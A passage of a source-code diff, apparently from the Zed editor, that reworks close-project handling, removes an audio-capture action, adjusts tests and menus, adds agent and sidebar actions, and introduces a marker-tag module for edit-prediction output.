+ move |_workspace, _: &CloseProject, window, cx| {
let Some(window_handle) = window.window_handle().downcast::<MultiWorkspace>() else {
return;
};
if let Some(app_state) = app_state.upgrade() {
- open_new(
- workspace::OpenOptions {
- replace_window: Some(window_handle),
- ..Default::default()
- },
- app_state,
- cx,
- |workspace, window, cx| {
- cx.activate(true);
- // Create buffer synchronously to avoid flicker
- let project = workspace.project().clone();
- let buffer = project.update(cx, |project, cx| {
- project.create_local_buffer("", None, true, cx)
- });
- let editor = cx.new(|cx| {
- Editor::for_buffer(buffer, Some(project), window, cx)
- });
- workspace.add_item_to_active_pane(
- Box::new(editor),
- None,
- true,
- window,
- cx,
- );
- },
- )
+ cx.spawn_in(window, async move |this, cx| {
+ let should_continue = this
+ .update_in(cx, |workspace, window, cx| {
+ workspace.prepare_to_close(
+ CloseIntent::ReplaceWindow,
+ window,
+ cx,
+ )
+ })?
+ .await?;
+ if should_continue {
+ let task = cx.update(|_window, cx| {
+ open_new(
+ workspace::OpenOptions {
+ replace_window: Some(window_handle),
+ ..Default::default()
+ },
+ app_state,
+ cx,
+ |workspace, window, cx| {
+ cx.activate(true);
+ let project = workspace.project().clone();
+ let buffer = project.update(cx, |project, cx| {
+ project.create_local_buffer("", None, true, cx)
+ });
+ let editor = cx.new(|cx| {
+ Editor::for_buffer(buffer, Some(project), window, cx)
+ });
+ workspace.add_item_to_active_pane(
+ Box::new(editor),
+ None,
+ true,
+ window,
+ cx,
+ );
+ },
+ )
+ })?;
+ task.await
+ } else {
+ Ok(())
+ }
+ })
.detach_and_log_err(cx);
}
}
@@ -1128,9 +1141,6 @@ fn register_actions(
.detach_and_log_err(cx);
}
}
- })
- .register_action(|workspace, _: &CaptureRecentAudio, window, cx| {
- capture_recent_audio(workspace, window, cx);
});
#[cfg(not(target_os = "windows"))]
@@ -2121,84 +2131,6 @@ fn open_settings_file(
.detach_and_log_err(cx);
}
-fn capture_recent_audio(workspace: &mut Workspace, _: &mut Window, cx: &mut Context<Workspace>) {
- struct CaptureRecentAudioNotification {
- focus_handle: gpui::FocusHandle,
- save_result: Option<Result<(PathBuf, Duration), anyhow::Error>>,
- _save_task: Task<anyhow::Result<()>>,
- }
-
- impl gpui::EventEmitter<DismissEvent> for CaptureRecentAudioNotification {}
- impl gpui::EventEmitter<SuppressEvent> for CaptureRecentAudioNotification {}
- impl gpui::Focusable for CaptureRecentAudioNotification {
- fn focus_handle(&self, _cx: &App) -> gpui::FocusHandle {
- self.focus_handle.clone()
- }
- }
- impl workspace::notifications::Notification for CaptureRecentAudioNotification {}
-
- impl Render for CaptureRecentAudioNotification {
- fn render(&mut self, _window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
- let message = match &self.save_result {
- None => format!(
- "Saving up to {} seconds of recent audio",
- REPLAY_DURATION.as_secs(),
- ),
- Some(Ok((path, duration))) => format!(
- "Saved {} seconds of all audio to {}",
- duration.as_secs(),
- path.display(),
- ),
- Some(Err(e)) => format!("Error saving audio replays: {e:?}"),
- };
-
- NotificationFrame::new()
- .with_title(Some("Saved Audio"))
- .show_suppress_button(false)
- .on_close(cx.listener(|_, _, _, cx| {
- cx.emit(DismissEvent);
- }))
- .with_content(message)
- }
- }
-
- impl CaptureRecentAudioNotification {
- fn new(cx: &mut Context<Self>) -> Self {
- if AudioSettings::get_global(cx).rodio_audio {
- let executor = cx.background_executor().clone();
- let save_task = cx.default_global::<audio::Audio>().save_replays(executor);
- let _save_task = cx.spawn(async move |this, cx| {
- let res = save_task.await;
- this.update(cx, |this, cx| {
- this.save_result = Some(res);
- cx.notify();
- })
- });
-
- Self {
- focus_handle: cx.focus_handle(),
- _save_task,
- save_result: None,
- }
- } else {
- Self {
- focus_handle: cx.focus_handle(),
- _save_task: Task::ready(Ok(())),
- save_result: Some(Err(anyhow::anyhow!(
- "Capturing recent audio is only supported on the experimental rodio audio pipeline"
- ))),
- }
- }
- }
- }
-
- workspace.show_notification(
- NotificationId::unique::<CaptureRecentAudioNotification>(),
- cx,
- |cx| cx.new(CaptureRecentAudioNotification::new),
- );
-}
-
/// Eagerly loads the active theme and icon theme based on the selections in the
/// theme settings.
///
@@ -2441,7 +2373,7 @@ mod tests {
.update(cx, |multi_workspace, window, cx| {
multi_workspace.workspace().update(cx, |workspace, cx| {
assert_eq!(workspace.worktrees(cx).count(), 2);
- assert!(workspace.left_dock().read(cx).is_open());
+ assert!(workspace.right_dock().read(cx).is_open());
assert!(
workspace
.active_pane()
@@ -2500,7 +2432,7 @@ mod tests {
.collect::<Vec<_>>(),
&[Path::new(path!("/root/e")).into()]
);
- assert!(workspace.left_dock().read(cx).is_open());
+ assert!(workspace.right_dock().read(cx).is_open());
assert!(workspace.active_pane().focus_handle(cx).is_focused(window));
})
.unwrap();
@@ -3454,7 +3386,11 @@ mod tests {
PathBuf::from(path!("/root/.git/HEAD")),
PathBuf::from(path!("/root/excluded_dir/ignored_subdir")),
];
- let (opened_workspace, new_items) = cx
+ let workspace::OpenResult {
+ window: opened_workspace,
+ opened_items: new_items,
+ ..
+ } = cx
.update(|cx| {
workspace::open_paths(
&paths_to_open,
@@ -4890,6 +4826,7 @@ mod tests {
"task",
"terminal",
"terminal_panel",
+ "theme",
"theme_selector",
"toast",
"toolchain",
@@ -5877,7 +5814,9 @@ mod tests {
//
// Window A: workspace for dir1, workspace for dir2
// Window B: workspace for dir3
- let (window_a, _) = cx
+ let workspace::OpenResult {
+ window: window_a, ..
+ } = cx
.update(|cx| {
Workspace::new_local(
vec![dir1.into()],
@@ -5901,7 +5840,9 @@ mod tests {
.expect("failed to open second workspace into window A");
cx.run_until_parked();
- let (window_b, _) = cx
+ let workspace::OpenResult {
+ window: window_b, ..
+ } = cx
.update(|cx| {
Workspace::new_local(
vec![dir3.into()],
@@ -5931,9 +5872,11 @@ mod tests {
cx.run_until_parked();
// Verify all workspaces retained their session_ids.
- let locations = workspace::last_session_workspace_locations(&session_id, None, fs.as_ref())
- .await
- .expect("expected session workspace locations");
+ let db = cx.update(|cx| workspace::WorkspaceDb::global(cx));
+ let locations =
+ workspace::last_session_workspace_locations(&db, &session_id, None, fs.as_ref())
+ .await
+ .expect("expected session workspace locations");
assert_eq!(
locations.len(),
3,
@@ -5960,9 +5903,10 @@ mod tests {
});
// --- Read back from DB and verify grouping ---
- let locations = workspace::last_session_workspace_locations(&session_id, None, fs.as_ref())
- .await
- .expect("expected session workspace locations");
+ let locations =
+ workspace::last_session_workspace_locations(&db, &session_id, None, fs.as_ref())
+ .await
+ .expect("expected session workspace locations");
assert_eq!(locations.len(), 3, "expected 3 session workspaces");
@@ -31,6 +31,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
MenuItem::action("Toggle All Docks", workspace::ToggleAllDocks),
MenuItem::submenu(Menu {
name: "Editor Layout".into(),
+ disabled: false,
items: vec![
MenuItem::action("Split Up", workspace::SplitUp::default()),
MenuItem::action("Split Down", workspace::SplitDown::default()),
@@ -60,39 +61,31 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
vec![
Menu {
name: "Zed".into(),
+ disabled: false,
items: vec![
MenuItem::action("About Zed", zed_actions::About),
MenuItem::action("Check for Updates", auto_update::Check),
MenuItem::separator(),
- MenuItem::submenu(Menu {
- name: "Settings".into(),
- items: vec![
- MenuItem::action("Open Settings", zed_actions::OpenSettings),
- MenuItem::action("Open Settings File", super::OpenSettingsFile),
- MenuItem::action("Open Project Settings", zed_actions::OpenProjectSettings),
- MenuItem::action(
- "Open Project Settings File",
- super::OpenProjectSettingsFile,
- ),
- MenuItem::action("Open Default Settings", super::OpenDefaultSettings),
- MenuItem::separator(),
- MenuItem::action("Open Keymap", zed_actions::OpenKeymap),
- MenuItem::action("Open Keymap File", zed_actions::OpenKeymapFile),
- MenuItem::action(
- "Open Default Key Bindings",
- zed_actions::OpenDefaultKeymap,
- ),
- MenuItem::separator(),
- MenuItem::action(
- "Select Theme...",
- zed_actions::theme_selector::Toggle::default(),
- ),
- MenuItem::action(
- "Select Icon Theme...",
- zed_actions::icon_theme_selector::Toggle::default(),
- ),
- ],
- }),
+ MenuItem::submenu(Menu::new("Settings").items([
+ MenuItem::action("Open Settings", zed_actions::OpenSettings),
+ MenuItem::action("Open Settings File", super::OpenSettingsFile),
+ MenuItem::action("Open Project Settings", zed_actions::OpenProjectSettings),
+ MenuItem::action("Open Project Settings File", super::OpenProjectSettingsFile),
+ MenuItem::action("Open Default Settings", super::OpenDefaultSettings),
+ MenuItem::separator(),
+ MenuItem::action("Open Keymap", zed_actions::OpenKeymap),
+ MenuItem::action("Open Keymap File", zed_actions::OpenKeymapFile),
+ MenuItem::action("Open Default Key Bindings", zed_actions::OpenDefaultKeymap),
+ MenuItem::separator(),
+ MenuItem::action(
+ "Select Theme...",
+ zed_actions::theme_selector::Toggle::default(),
+ ),
+ MenuItem::action(
+ "Select Icon Theme...",
+ zed_actions::icon_theme_selector::Toggle::default(),
+ ),
+ ])),
MenuItem::separator(),
#[cfg(target_os = "macos")]
MenuItem::os_submenu("Services", gpui::SystemMenuType::Services),
@@ -113,6 +106,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "File".into(),
+ disabled: false,
items: vec![
MenuItem::action("New", workspace::NewFile),
MenuItem::action("New Window", workspace::NewWindow),
@@ -160,6 +154,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "Edit".into(),
+ disabled: false,
items: vec![
MenuItem::os_action("Undo", editor::actions::Undo, OsAction::Undo),
MenuItem::os_action("Redo", editor::actions::Redo, OsAction::Redo),
@@ -180,6 +175,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "Selection".into(),
+ disabled: false,
items: vec![
MenuItem::os_action(
"Select All",
@@ -227,10 +223,12 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "View".into(),
+ disabled: false,
items: view_items,
},
Menu {
name: "Go".into(),
+ disabled: false,
items: vec![
MenuItem::action("Back", workspace::GoBack),
MenuItem::action("Forward", workspace::GoForward),
@@ -262,6 +260,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "Run".into(),
+ disabled: false,
items: vec![
MenuItem::action(
"Spawn Task",
@@ -286,6 +285,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "Window".into(),
+ disabled: false,
items: vec![
MenuItem::action("Minimize", super::Minimize),
MenuItem::action("Zoom", super::Zoom),
@@ -294,6 +294,7 @@ pub fn app_menus(cx: &mut App) -> Vec<Menu> {
},
Menu {
name: "Help".into(),
+ disabled: false,
items: vec![
MenuItem::action(
"View Release Notes Locally",
@@ -5,7 +5,7 @@ use anyhow::{Context as _, Result, anyhow};
use cli::{CliRequest, CliResponse, ipc::IpcSender};
use cli::{IpcHandshake, ipc};
use client::{ZedLink, parse_zed_link};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::Editor;
use fs::Fs;
use futures::channel::mpsc::{UnboundedReceiver, UnboundedSender};
@@ -29,7 +29,7 @@ use util::ResultExt;
use util::paths::PathWithPosition;
use workspace::PathList;
use workspace::item::ItemHandle;
-use workspace::{AppState, MultiWorkspace, OpenOptions, SerializedWorkspaceLocation};
+use workspace::{AppState, MultiWorkspace, OpenOptions, OpenResult, SerializedWorkspaceLocation};
#[derive(Default, Debug)]
pub struct OpenRequest {
@@ -345,7 +345,11 @@ pub async fn open_paths_with_positions(
.map(|path_with_position| path_with_position.path.clone())
.collect::<Vec<_>>();
- let (multi_workspace, mut items) = cx
+ let OpenResult {
+ window: multi_workspace,
+ opened_items: mut items,
+ ..
+ } = cx
.update(|cx| workspace::open_paths(&paths, app_state, open_options, cx))
.await?;
@@ -487,7 +491,8 @@ async fn open_workspaces(
if grouped_locations.is_empty() {
// If we have no paths to open, show the welcome screen if this is the first launch
- if matches!(KEY_VALUE_STORE.read_kvp(FIRST_OPEN), Ok(None)) {
+ let kvp = cx.update(|cx| KeyValueStore::global(cx));
+ if matches!(kvp.read_kvp(FIRST_OPEN), Ok(None)) {
cx.update(|cx| show_onboarding_view(app_state, cx).detach());
}
// If not the first launch, show an empty window with empty editor
@@ -110,6 +110,12 @@ pub struct Extensions {
#[serde(deny_unknown_fields)]
pub struct AcpRegistry;
+/// Show call diagnostics and connection quality statistics.
+#[derive(PartialEq, Clone, Default, Debug, Deserialize, JsonSchema, Action)]
+#[action(namespace = collab)]
+#[serde(deny_unknown_fields)]
+pub struct ShowCallStats;
+
/// Decreases the font size in the editor buffer.
#[derive(PartialEq, Clone, Default, Debug, Deserialize, JsonSchema, Action)]
#[action(namespace = zed)]
@@ -191,6 +197,8 @@ pub mod editor {
MoveUp,
/// Moves cursor down.
MoveDown,
+ /// Reveals the current file in the system file manager.
+ RevealInFileManager,
]
);
}
@@ -325,6 +333,12 @@ pub mod feedback {
);
}
+pub mod theme {
+ use gpui::actions;
+
+ actions!(theme, [ToggleMode]);
+}
+
pub mod theme_selector {
use gpui::Action;
use schemars::JsonSchema;
@@ -469,6 +483,33 @@ pub mod agent {
/// The base ref that the diff was computed against (e.g. "main").
pub base_ref: SharedString,
}
+
+ /// A single merge conflict region extracted from a file.
+ #[derive(Clone, Debug, PartialEq, Deserialize, JsonSchema)]
+ pub struct ConflictContent {
+ pub file_path: String,
+ pub conflict_text: String,
+ pub ours_branch_name: String,
+ pub theirs_branch_name: String,
+ }
+
+ /// Opens a new agent thread to resolve specific merge conflicts.
+ #[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)]
+ #[action(namespace = agent)]
+ #[serde(deny_unknown_fields)]
+ pub struct ResolveConflictsWithAgent {
+ /// Individual conflicts with their full text.
+ pub conflicts: Vec<ConflictContent>,
+ }
+
+ /// Opens a new agent thread to resolve merge conflicts in the given file paths.
+ #[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)]
+ #[action(namespace = agent)]
+ #[serde(deny_unknown_fields)]
+ pub struct ResolveConflictedFilesWithAgent {
+ /// File paths with unresolved conflicts (for project-wide resolution).
+ pub conflicted_file_paths: Vec<String>,
+ }
}
pub mod assistant {
@@ -737,6 +778,20 @@ pub mod preview {
}
}
+pub mod agents_sidebar {
+ use gpui::actions;
+
+ actions!(
+ agents_sidebar,
+ [
+ /// Moves focus to the sidebar's search/filter editor.
+ FocusSidebarFilter,
+ /// Moves the active workspace to a new window.
+ MoveWorkspaceToNewWindow,
+ ]
+ );
+}
+
pub mod notebook {
use gpui::actions;
@@ -0,0 +1,1691 @@
+use anyhow::{Context as _, Result, anyhow};
+
+pub const MARKER_TAG_PREFIX: &str = "<|marker_";
+pub const MARKER_TAG_SUFFIX: &str = "|>";
+pub const RELATIVE_MARKER_TAG_PREFIX: &str = "<|marker";
+const V0316_MIN_BLOCK_LINES: usize = 3;
+const V0316_MAX_BLOCK_LINES: usize = 8;
+const V0318_MIN_BLOCK_LINES: usize = 6;
+const V0318_MAX_BLOCK_LINES: usize = 16;
+const MAX_NUDGE_LINES: usize = 5;
+pub const V0316_END_MARKER: &str = "<[end▁of▁sentence]>";
+pub const V0317_END_MARKER: &str = "<[end▁of▁sentence]>";
+pub const V0318_END_MARKER: &str = "<[end▁of▁sentence]>";
+
+pub fn marker_tag(number: usize) -> String {
+ format!("{MARKER_TAG_PREFIX}{number}{MARKER_TAG_SUFFIX}")
+}
+
+pub fn marker_tag_relative(delta: isize) -> String {
+ if delta > 0 {
+ format!("<|marker+{delta}|>")
+ } else if delta == 0 {
+ String::from("<|marker-0|>")
+ } else {
+ format!("<|marker{delta}|>")
+ }
+}
+
+struct LineInfo {
+ start: usize,
+ is_blank: bool,
+ is_good_start: bool,
+}
+
+fn collect_line_info(text: &str) -> Vec<LineInfo> {
+ let mut lines = Vec::new();
+ let mut offset = 0;
+ for line in text.split('\n') {
+ let trimmed = line.trim();
+ let is_blank = trimmed.is_empty();
+ let is_good_start = !is_blank && !is_structural_tail(trimmed);
+ lines.push(LineInfo {
+ start: offset,
+ is_blank,
+ is_good_start,
+ });
+ offset += line.len() + 1;
+ }
+ // split('\n') on "abc\n" yields ["abc", ""] — drop the phantom trailing
+ // empty element when the text ends with '\n'.
+ if text.ends_with('\n') && lines.len() > 1 {
+ lines.pop();
+ }
+ lines
+}
+
+fn is_structural_tail(trimmed_line: &str) -> bool {
+ if trimmed_line.starts_with(&['}', ']', ')']) {
+ return true;
+ }
+ matches!(
+ trimmed_line.trim_end_matches(';'),
+ "break" | "continue" | "return" | "throw" | "end"
+ )
+}
+
+/// Starting from line `from`, scan up to `MAX_NUDGE_LINES` forward to find a
+/// line with `is_good_start`. Returns `None` if no suitable line is found.
+fn skip_to_good_start(lines: &[LineInfo], from: usize) -> Option<usize> {
+ (from..lines.len().min(from + MAX_NUDGE_LINES)).find(|&i| lines[i].is_good_start)
+}
+
+/// Compute byte offsets within `editable_text` where marker boundaries should
+/// be placed.
+///
+/// Returns a sorted `Vec<usize>` that always starts with `0` and ends with
+/// `editable_text.len()`. Interior offsets are placed at line boundaries
+/// (right after a `\n`), preferring blank-line boundaries when available and
+/// respecting `min_block_lines` / `max_block_lines` constraints.
+fn compute_marker_offsets_with_limits(
+ editable_text: &str,
+ min_block_lines: usize,
+ max_block_lines: usize,
+) -> Vec<usize> {
+ if editable_text.is_empty() {
+ return vec![0, 0];
+ }
+
+ let lines = collect_line_info(editable_text);
+ let mut offsets = vec![0usize];
+ let mut last_boundary_line = 0;
+ let mut i = 0;
+
+ while i < lines.len() {
+ let gap = i - last_boundary_line;
+
+ // Blank-line split: non-blank line following blank line(s) with enough
+ // accumulated lines.
+ if gap >= min_block_lines && !lines[i].is_blank && i > 0 && lines[i - 1].is_blank {
+ let target = if lines[i].is_good_start {
+ i
+ } else {
+ skip_to_good_start(&lines, i).unwrap_or(i)
+ };
+ if lines.len() - target >= min_block_lines
+ && lines[target].start > *offsets.last().unwrap_or(&0)
+ {
+ offsets.push(lines[target].start);
+ last_boundary_line = target;
+ i = target + 1;
+ continue;
+ }
+ }
+
+ // Hard cap: too many lines without a split.
+ if gap >= max_block_lines {
+ let target = skip_to_good_start(&lines, i).unwrap_or(i);
+ if lines[target].start > *offsets.last().unwrap_or(&0) {
+ offsets.push(lines[target].start);
+ last_boundary_line = target;
+ i = target + 1;
+ continue;
+ }
+ }
+
+ i += 1;
+ }
+
+ let end = editable_text.len();
+ if *offsets.last().unwrap_or(&0) != end {
+ offsets.push(end);
+ }
+
+ offsets
+}
+
+/// Compute byte offsets within `editable_text` for the V0316/V0317 block sizing rules.
+pub fn compute_marker_offsets(editable_text: &str) -> Vec<usize> {
+ compute_marker_offsets_with_limits(editable_text, V0316_MIN_BLOCK_LINES, V0316_MAX_BLOCK_LINES)
+}
+
+pub fn compute_marker_offsets_v0318(editable_text: &str) -> Vec<usize> {
+ compute_marker_offsets_with_limits(editable_text, V0318_MIN_BLOCK_LINES, V0318_MAX_BLOCK_LINES)
+}
+
+/// Write the editable region content with marker tags, inserting the cursor
+/// marker at the given offset within the editable text.
+pub fn write_editable_with_markers(
+ output: &mut String,
+ editable_text: &str,
+ cursor_offset_in_editable: usize,
+ cursor_marker: &str,
+) {
+ let marker_offsets = compute_marker_offsets(editable_text);
+ let mut cursor_placed = false;
+ for (i, &offset) in marker_offsets.iter().enumerate() {
+ let marker_num = i + 1;
+ if !output.is_empty() && !output.ends_with('\n') {
+ output.push('\n');
+ }
+ output.push_str(&marker_tag(marker_num));
+
+ if let Some(&next_offset) = marker_offsets.get(i + 1) {
+ output.push('\n');
+ let block = &editable_text[offset..next_offset];
+ if !cursor_placed
+ && cursor_offset_in_editable >= offset
+ && cursor_offset_in_editable <= next_offset
+ {
+ cursor_placed = true;
+ let cursor_in_block = cursor_offset_in_editable - offset;
+ output.push_str(&block[..cursor_in_block]);
+ output.push_str(cursor_marker);
+ output.push_str(&block[cursor_in_block..]);
+ } else {
+ output.push_str(block);
+ }
+ }
+ }
+}
+
+/// Strip any `<|marker_N|>` tags from `text`.
+///
+/// When a marker tag sits on its own line (followed by `\n`), the trailing
+/// newline is also removed so the surrounding lines stay joined naturally.
+fn strip_marker_tags(text: &str) -> String {
+ let mut result = String::with_capacity(text.len());
+ let mut pos = 0;
+ let bytes = text.as_bytes();
+ while let Some(rel) = text[pos..].find(MARKER_TAG_PREFIX) {
+ result.push_str(&text[pos..pos + rel]);
+ let num_start = pos + rel + MARKER_TAG_PREFIX.len();
+ if let Some(suffix_rel) = text[num_start..].find(MARKER_TAG_SUFFIX) {
+ let mut tag_end = num_start + suffix_rel + MARKER_TAG_SUFFIX.len();
+ if bytes.get(tag_end) == Some(&b'\n') {
+ tag_end += 1;
+ }
+ pos = tag_end;
+ } else {
+ result.push_str(MARKER_TAG_PREFIX);
+ pos = num_start;
+ }
+ }
+ result.push_str(&text[pos..]);
+ result
+}
+
+/// Parse model output that uses the marker format.
+///
+/// Returns `(start_marker_num, end_marker_num, content_between_markers)`.
+/// The leading format-level newline after the start marker is stripped.
+/// Trailing newlines are preserved so blank-line endings in the editable
+/// region are not lost.
+///
+/// Any extra intermediate marker tags that the model may have inserted
+/// between the first and last markers are stripped from the returned content.
+pub fn extract_marker_span(text: &str) -> Result<(usize, usize, String)> {
+ let first_tag_start = text
+ .find(MARKER_TAG_PREFIX)
+ .context("no start marker found in output")?;
+ let first_num_start = first_tag_start + MARKER_TAG_PREFIX.len();
+ let first_num_end = text[first_num_start..]
+ .find(MARKER_TAG_SUFFIX)
+ .map(|i| i + first_num_start)
+ .context("malformed start marker tag")?;
+ let start_num: usize = text[first_num_start..first_num_end]
+ .parse()
+ .context("start marker number is not a valid integer")?;
+ let first_tag_end = first_num_end + MARKER_TAG_SUFFIX.len();
+
+ let last_tag_start = text
+ .rfind(MARKER_TAG_PREFIX)
+ .context("no end marker found in output")?;
+ let last_num_start = last_tag_start + MARKER_TAG_PREFIX.len();
+ let last_num_end = text[last_num_start..]
+ .find(MARKER_TAG_SUFFIX)
+ .map(|i| i + last_num_start)
+ .context("malformed end marker tag")?;
+ let end_num: usize = text[last_num_start..last_num_end]
+ .parse()
+ .context("end marker number is not a valid integer")?;
+
+ if start_num == end_num {
+ return Err(anyhow!(
+ "start and end markers are the same (marker {})",
+ start_num
+ ));
+ }
+
+ let mut content_start = first_tag_end;
+ if text.as_bytes().get(content_start) == Some(&b'\n') {
+ content_start += 1;
+ }
+ let content_end = last_tag_start;
+
+ let content = &text[content_start..content_end.max(content_start)];
+ let content = strip_marker_tags(content);
+ Ok((start_num, end_num, content))
+}
+
+/// Given old editable text and model output with marker span, reconstruct the
+/// full new editable region.
+pub fn apply_marker_span(old_editable: &str, output: &str) -> Result<String> {
+ let (start_num, end_num, raw_new_span) = extract_marker_span(output)?;
+ let marker_offsets = compute_marker_offsets(old_editable);
+
+ let start_idx = start_num
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let end_idx = end_num
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let start_byte = *marker_offsets
+ .get(start_idx)
+ .context("start marker number out of range")?;
+ let end_byte = *marker_offsets
+ .get(end_idx)
+ .context("end marker number out of range")?;
+
+ if start_byte > end_byte {
+ return Err(anyhow!("start marker must come before end marker"));
+ }
+
+ let old_span = &old_editable[start_byte..end_byte];
+ let mut new_span = raw_new_span;
+ if old_span.ends_with('\n') && !new_span.ends_with('\n') && !new_span.is_empty() {
+ new_span.push('\n');
+ }
+ if !old_span.ends_with('\n') && new_span.ends_with('\n') {
+ new_span.pop();
+ }
+
+ let mut result = String::new();
+ result.push_str(&old_editable[..start_byte]);
+ result.push_str(&new_span);
+ result.push_str(&old_editable[end_byte..]);
+
+ Ok(result)
+}
+
+/// Compare old and new editable text, find the minimal marker span that covers
+/// all changes, and encode the result with marker tags.
+pub fn encode_from_old_and_new(
+ old_editable: &str,
+ new_editable: &str,
+ cursor_offset_in_new: Option<usize>,
+ cursor_marker: &str,
+ end_marker: &str,
+ no_edits_marker: &str,
+) -> Result<String> {
+ if old_editable == new_editable {
+ return Ok(format!("{no_edits_marker}{end_marker}"));
+ }
+
+ let marker_offsets = compute_marker_offsets(old_editable);
+ let (common_prefix, common_suffix) =
+ common_prefix_suffix(old_editable.as_bytes(), new_editable.as_bytes());
+ let change_end_in_old = old_editable.len() - common_suffix;
+
+ let start_marker_idx = marker_offsets
+ .iter()
+ .rposition(|&offset| offset <= common_prefix)
+ .unwrap_or(0);
+ let end_marker_idx = marker_offsets
+ .iter()
+ .position(|&offset| offset >= change_end_in_old)
+ .unwrap_or(marker_offsets.len() - 1);
+
+ let old_start = marker_offsets[start_marker_idx];
+ let old_end = marker_offsets[end_marker_idx];
+
+ let new_start = old_start;
+ let new_end = new_editable
+ .len()
+ .saturating_sub(old_editable.len().saturating_sub(old_end));
+
+ let new_span = &new_editable[new_start..new_end];
+
+ let start_marker_num = start_marker_idx + 1;
+ let end_marker_num = end_marker_idx + 1;
+
+ let mut result = String::new();
+ result.push_str(&marker_tag(start_marker_num));
+ result.push('\n');
+
+ if let Some(cursor_offset) = cursor_offset_in_new {
+ if cursor_offset >= new_start && cursor_offset <= new_end {
+ let cursor_in_span = cursor_offset - new_start;
+ let bounded = cursor_in_span.min(new_span.len());
+ result.push_str(&new_span[..bounded]);
+ result.push_str(cursor_marker);
+ result.push_str(&new_span[bounded..]);
+ } else {
+ result.push_str(new_span);
+ }
+ } else {
+ result.push_str(new_span);
+ }
+
+ if !result.ends_with('\n') {
+ result.push('\n');
+ }
+ result.push_str(&marker_tag(end_marker_num));
+ result.push('\n');
+ result.push_str(end_marker);
+
+ Ok(result)
+}
+
+/// Extract the full editable region from text that uses marker tags.
+///
+/// Returns the concatenation of all block contents between the first and last
+/// markers, with intermediate marker tags stripped.
+pub fn extract_editable_region_from_markers(text: &str) -> Option<String> {
+ let first_marker_start = text.find(MARKER_TAG_PREFIX)?;
+
+ let mut markers: Vec<(usize, usize)> = Vec::new();
+ let mut search_start = first_marker_start;
+ while let Some(rel_pos) = text[search_start..].find(MARKER_TAG_PREFIX) {
+ let tag_start = search_start + rel_pos;
+ let num_start = tag_start + MARKER_TAG_PREFIX.len();
+ let num_end = text[num_start..].find(MARKER_TAG_SUFFIX)?;
+ let tag_end = num_start + num_end + MARKER_TAG_SUFFIX.len();
+ markers.push((tag_start, tag_end));
+ search_start = tag_end;
+ }
+
+ if markers.len() < 2 {
+ return None;
+ }
+
+ let (_, first_tag_end) = markers[0];
+ let (last_tag_start, _) = markers[markers.len() - 1];
+
+ let mut content_start = first_tag_end;
+ if text.as_bytes().get(content_start) == Some(&b'\n') {
+ content_start += 1;
+ }
+ let mut content_end = last_tag_start;
+ if content_end > content_start && text.as_bytes().get(content_end - 1) == Some(&b'\n') {
+ content_end -= 1;
+ }
+
+ let raw = &text[content_start..content_end];
+ let result = strip_marker_tags(raw);
+ let result = result.strip_suffix('\n').unwrap_or(&result).to_string();
+ Some(result)
+}
+
+struct ParsedTag {
+ value: isize,
+ tag_start: usize,
+ tag_end: usize,
+}
+
+fn collect_tags(text: &str, prefix: &str, parse: fn(&str) -> Option<isize>) -> Vec<ParsedTag> {
+ let mut tags = Vec::new();
+ let mut search_from = 0;
+ while let Some(rel_pos) = text[search_from..].find(prefix) {
+ let tag_start = search_from + rel_pos;
+ let payload_start = tag_start + prefix.len();
+ if let Some(suffix_rel) = text[payload_start..].find(MARKER_TAG_SUFFIX) {
+ let payload_end = payload_start + suffix_rel;
+ if let Some(value) = parse(&text[payload_start..payload_end]) {
+ let tag_end = payload_end + MARKER_TAG_SUFFIX.len();
+ tags.push(ParsedTag {
+ value,
+ tag_start,
+ tag_end,
+ });
+ search_from = tag_end;
+ continue;
+ }
+ }
+ search_from = tag_start + prefix.len();
+ }
+ tags
+}
+
+fn collect_marker_tags(text: &str) -> Vec<ParsedTag> {
+ collect_tags(text, MARKER_TAG_PREFIX, |s| {
+ s.parse::<usize>().ok().map(|n| n as isize)
+ })
+}
+
+fn collect_relative_marker_tags(text: &str) -> Vec<ParsedTag> {
+ collect_tags(text, RELATIVE_MARKER_TAG_PREFIX, |s| {
+ s.parse::<isize>().ok()
+ })
+}
+
+pub fn nearest_marker_number(cursor_offset: Option<usize>, marker_offsets: &[usize]) -> usize {
+ let cursor = cursor_offset.unwrap_or(0);
+ marker_offsets
+ .iter()
+ .enumerate()
+ .min_by_key(|(_, offset)| (**offset as isize - cursor as isize).unsigned_abs())
+ .map(|(idx, _)| idx + 1)
+ .unwrap_or(1)
+}
+
+fn cursor_block_index(cursor_offset: Option<usize>, marker_offsets: &[usize]) -> usize {
+ let cursor = cursor_offset.unwrap_or(0);
+ marker_offsets
+ .windows(2)
+ .position(|window| cursor >= window[0] && cursor < window[1])
+ .unwrap_or_else(|| marker_offsets.len().saturating_sub(2))
+}
+
+fn common_prefix_suffix(a: &[u8], b: &[u8]) -> (usize, usize) {
+ let prefix = a.iter().zip(b.iter()).take_while(|(x, y)| x == y).count();
+ let remaining_a = a.len() - prefix;
+ let remaining_b = b.len() - prefix;
+ let max_suffix = remaining_a.min(remaining_b);
+ let suffix = a[a.len() - max_suffix..]
+ .iter()
+ .rev()
+ .zip(b[b.len() - max_suffix..].iter().rev())
+ .take_while(|(x, y)| x == y)
+ .count();
+ (prefix, suffix)
+}
+
+/// Map a byte offset from old span coordinates to new span coordinates,
+/// using common prefix/suffix within the span for accuracy.
+fn map_boundary_offset(
+ old_rel: usize,
+ old_span_len: usize,
+ new_span_len: usize,
+ span_common_prefix: usize,
+ span_common_suffix: usize,
+) -> usize {
+ if old_rel <= span_common_prefix {
+ old_rel
+ } else if old_rel >= old_span_len - span_common_suffix {
+ new_span_len - (old_span_len - old_rel)
+ } else {
